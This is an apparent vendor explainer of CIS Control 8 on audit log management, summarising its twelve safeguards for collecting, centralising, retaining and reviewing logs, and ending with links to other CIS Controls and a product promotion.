Audit logs provide a rich source of data critical to preventing, detecting, understanding, and minimizing the impact of network or data compromise in a timely manner.
Collection logs and regular reviews are useful for identifying baselines, establishing operational trends, and detecting abnormalities. In some cases, logging may be the only evidence of a successful attack.
CIS Control 8 emphasizes the need for centralized collection and storage and standardization to better coordinate audit log reviews. Some industries have regulatory bodies that require the collection, retention, and review of logs, so CIS Control 8 is not only important but also, in some cases, mandatory.
The Control is composed of twelve safeguards, mostly in the IG2 category, with Protect or Detect security functions that all organizations with enterprise assets should implement.
Audit logs should capture detailed information about (1) what event happened, (2) what system the event happened on, (3) what time the event happened, and (4) who caused the event to happen. Alerts should be set for suspicious or major events, such as when users attempt to access resources without appropriate privileges or execution of binaries that should not exist on a system.
Audit logs are also a target for attackers looking to cover their tracks. So, audit logging must be configured to enforce access control and limit the users who can modify or delete logging data.
The CIS Benchmarks, which are available for many product families, are best-practice security configuration guides that are mapped to the controls and walk you through configuration remediation step-by-step.
Key Takeaways for Control 8
An audit log management plan should at least implement processes to:
- Ensure that detailed, time-synchronized audit logs are collected across enterprise assets.
- Ensure that logs are stored in a centralized location and retained for a minimum of 90 days.
- Ensure audit log reviews are conducted on a weekly basis or more often to establish baselines and detect potential threats.
Safeguards for Control 8
8.1) Establish and Maintain an Audit Log Management Process
Description: Establish and maintain an audit log management process that defines the enterprise’s logging requirements. At a minimum, address the collection, review, and retention of logs for enterprise assets. Review and update documentation annually or when significant enterprise changes occur, that could impact this Safeguard.
Notes: The security function associated with this safeguard is Govern. Being able to properly govern enterprise assets provides the opportunity to protect them by ensuring that audit logs are collected, reviewed, and maintained in a systematic and repeatable manner. Audit logs need to be complete and accurate. It may be necessary to schedule simulations of events to verify that desired logs are generated. Tools may be required to ingest and search logs. Log data may need to be normalized to enable quick and efficient analysis.
8.2) Collect Audit Logs
Description: Collect audit logs. Ensure that logging, per the enterprise’s log management process, has been enabled across enterprise assets.
Notes: The security function associated with this safeguard is Protect. It’s basic cyber hygiene and should be implemented by all enterprises.
8.3) Ensure Adequate Audit Log Storage
Description: Ensure that logging destinations maintain adequate storage to comply with the enterprise’s audit log management process.
Notes: The security function associated with this safeguard is Protect. Protection of enterprise assets and retention of log history, ensuring that logging audit or compliance requirements are met.
8.4) Standardize Time Synchronization
Description: Standardize time synchronization. Configure at least two synchronized time sources across enterprise assets where supported.
Notes: The security function associated with this safeguard is Protect.
8.5) Collect Detailed Audit Logs
Description: Configure detailed audit logging for enterprise assets containing sensitive data. Include even source, date, username, timestamp, source addresses, destination addresses, and other useful elements that could assist in a forensic investigation.
Notes: The security function associated with this safeguard is Detect. Detection of abnormalities and data compromise by ensuring verbose logs are collected, which allows us to reconstruct what happened during an event and establish the extent of affected assets.
8.6) Collect DNS Query Audit Logs
Description: Collect DNS query audit logs on enterprise assets where appropriate and supported.
Notes: The security function associated with this safeguard is Detect. DNS query logs can help track down misconfigured hosts or signs and the source of an intrusion or attack.
8.7) Collect URL Request Audit Logs
Description: Collect URL request audit logs on enterprise assets where appropriate and supported.
Notes: The security function associated with this safeguard is Detect.
8.8) Collect Command-Line Audit Logs
Description: Collect command-line audit logs. Example implementations include collecting logs from PowerShell, BASH, and remote administrative terminals.
Notes: The security function associated with this safeguard is Detect. The ability to detect unusual or threatening behavior at command consoles. Attackers may utilize a common set of commands from recon to exfiltration or impact.
8.9) Centralize Audit Logs
Description: Centralize, to the extent possible, audit log collection and retention across enterprise assets.
Notes: The security function associated with this safeguard is Detect. Centralizing audit logs will make collection, retention, and review simpler. Tools exist to ingest, normalize, and parse logs for efficient searching and analysis.
8.10) Retain Audit Logs
Description: Retain audit logs across enterprise assets for a minimum of 90 days.
Notes: The security function associated with this safeguard is Protect. Protection of enterprise assets by requiring real-time log data to be retained for a period of time to satisfy audit or compliance needs.
8.11) Conduct Audit Log Reviews
Description: Conduct reviews of audit logs to detect anomalies or abnormal events that could indicate a potential threat. Conduct reviews on a weekly or more frequent basis.
Notes: The security function associated with this safeguard is Detect. It is not enough to just collect audit logs. This IG2 Safeguard intends to detect unusual behavior through periodic log reviews.
8.12) Collect Service Provider Logs
Description: Collect service provider logs where supported. Example implementations include collecting authentication and authorization events, data creation and disposal events, and user management events.
Notes: The security function associated with this safeguard is Detect.
See how simple and effective security controls can create a framework that helps you protect your organization and data from known cyber-attack vectors by downloading the CIS Controls guide here.
Read more about the 18 CIS Controls here:
CIS Control 1: Inventory and Control of Enterprise Assets
CIS Control 2: Inventory and Control of Software Assets
CIS Control 3: Data Protection
CIS Control 4: Secure Configuration of Enterprise Assets and Software
CIS Control 5: Account Management
CIS Control 6: Access Control Management
CIS Control 7: Continuous Vulnerability Management
CIS Control 8: Audit Log Management
CIS Control 9: Email and Web Browser Protections
CIS Control 10: Malware Defenses
CIS Control 12: Network Infrastructure Management
CIS Control 13: Network Monitoring and Defense
CIS Control 14: Security Awareness and Skill Training
CIS Control 15: Service Provider Management
CIS Control 16: Application Software Security
Get Foundational Security with the CIS Controls Monitoring
Use CIS Controls to establish solid protection against the most common attacks and use Tripwire to provide coverage for the controls.
